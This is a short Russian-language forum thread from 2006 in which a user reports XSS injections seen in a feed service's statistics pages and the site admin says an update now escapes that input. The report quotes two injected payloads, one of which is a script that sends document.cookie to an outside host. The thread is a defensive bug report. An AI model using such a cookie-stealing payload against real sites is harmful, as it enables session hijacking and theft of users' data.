Список форумов www.kytoon.com  Список форумов www.kytoon.com  
  www.kytoon.com
    Поиск  Поиск   Пользователи  Пользователи   Группы  Группы
 
Регистрация  ::  Вход Войти и проверить личные сообщения
 
Список форумов www.kytoon.com » Mfeed » XSS уязвимость

Начать новую тему  Ответить на тему
 XSS уязвимость
Автор Сообщение
backup
СообщениеДобавлено: Ср Ноя 29, 2006 8:21 am    Заголовок сообщения: Ответить с цитатой



Зарегистрирован: 26.01.2007
Сообщения: 16777215

в статсах мультифида встречаются вот такие запросы:

[code]
<script>alert('Hier ist die XSS lьcke');<script>
<script>(new Image).src = "http://www.boeserechner.de/s/c.php?c=" + escape(document.cookie);</script>)
и т.п.
[/code]

браузер их исполняет
Вернуться к началу
Begemot
СообщениеДобавлено: Чт Ноя 30, 2006 10:55 am    Заголовок сообщения: Ответить с цитатой

Site Admin

Зарегистрирован: 13.03.2005
Сообщения: 413

практически это ничем не грозит так как пароль хранится не в куке,
но могут быть другие комбинации кодов, поэтому я уже сделал апдейт,
там это все дело квотится.
Вернуться к началу
Показать сообщения:   
Начать новую тему  Ответить на тему Страница 1 из 1

Список форумов www.kytoon.com » Mfeed » XSS уязвимость



 
 


DAJ Glass (1.0.5) template by Dustin Baccetti
EQ graphic based off of a design from www.freeclipart.nu
Powered by phpBB © 2001, 2002 phpBB Group